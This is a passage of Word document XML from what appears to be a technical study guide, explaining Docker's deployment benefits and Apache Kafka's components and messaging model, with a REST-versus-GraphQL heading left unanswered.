          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cross-Platform Compatibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E235224" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker containers can run on any system that supports Docker, whether it’s a developer’s laptop, an on-premises server, or a cloud platform. This is because Docker containers are platform-agnostic and run on a container runtime that abstracts the underlying hardware and OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C131056" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker images can be built once and run anywhere, eliminating the "works on my machine" problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4266843D" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simplified Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EBFF8F" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Docker containers bundle the application and its dependencies into a single, self-contained unit. This makes it easy to deploy applications across various environments without the need for extensive configuration or dependency management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B80445" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="625"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Teams can automate deployments using container orchestration tools like Kubernetes, which can manage the deployment, scaling, and operation of containers across a cluster of machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F886D28" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Real-World Benefits for Backend Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD08A2C" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scalability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker containers can be easily scaled horizontally by running multiple instances of the same container image across different nodes or servers. Orchestrators like Kubernetes can manage scaling automatically based on demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E519086" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consistency Across Environments:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> With Docker, the same container image can be deployed in development, testing, staging, and production environments, ensuring consistency and reducing the risk of environment-specific bugs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A225D04" w14:textId="77777777" w:rsidR="00F1397E" w:rsidRPr="00DA2F32" w:rsidRDefault="00F1397E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microservices Architecture:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker’s isolation and portability are ideal for microservices architectures, where each service can be deployed as a separate container, independent of the others. This allows for independent development, scaling, and deployment of services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A90955" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E5D54D" w14:textId="2576AC1C" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_Toc178383361"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Differentiate between RESTful APIs and GraphQL and discuss potential use cases for GraphQL.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w14:paraId="52FECEF6" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571E5DD6" w14:textId="48979AD5" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_Toc178383362"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Describe the role of Kafka as a distributed streaming platform.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p w14:paraId="1BDEB4EC" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Apache Kafka is a distributed streaming platform that serves as a powerful tool for building real-time data pipelines and streaming applications. Kafka was originally developed by LinkedIn and later open-sourced as an Apache project. It is designed to handle high-throughput, low-latency data streams in a scalable, fault-tolerant manner. The role of Kafka as a distributed streaming platform can be understood through its key components, functionalities, and typical use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CF864B" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Components of Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395FCCCE" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Producers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40C158" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Producers are the entities or applications that publish data (or messages) to Kafka topics. They can send data asynchronously to Kafka, which is then stored and made available for consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4623E2" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consumers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DB89EB" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consumers subscribe to Kafka topics and read the data published by producers. Consumers can process data in real-time or batch mode, depending on the application requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6846B6BD" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Brokers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDD5D9A" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka runs as a cluster of one or more servers called brokers. Each broker is responsible for storing data and serving client requests. Brokers manage data replication, fault tolerance, and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CE131" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Topics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64380591" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Topics are logical channels to which producers send messages and from which consumers read. A topic can have multiple partitions, enabling parallelism and scalability. Each partition is ordered and immutable, meaning new data is always appended at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A73C0" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6177720D" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A topic is split into partitions, which are the basic unit of parallelism in Kafka. Partitions allow Kafka to scale horizontally across multiple brokers and also provide ordering guarantees within a partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5F4CBE" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Zookeeper:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690FDDB4" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="627"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Zookeeper is used to manage and coordinate the Kafka cluster. It keeps track of broker metadata, topic configurations, and partition leader elections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B92393" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Core Functionalities of Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7996886E" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Publish-Subscribe Messaging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCCF7C" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Kafka provides a publish-subscribe messaging model where producers write data to topics, and consumers read from those topics. Unlike traditional messaging systems, Kafka retains messages even after they are consumed, allowing multiple consumers to read the same data independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B094B2" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Distributed Data Storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084569E7" w14:textId="77777777" w:rsidR="002B66CD" w:rsidRPr="00DA2F32" w:rsidRDefault="002B66CD" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="628"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
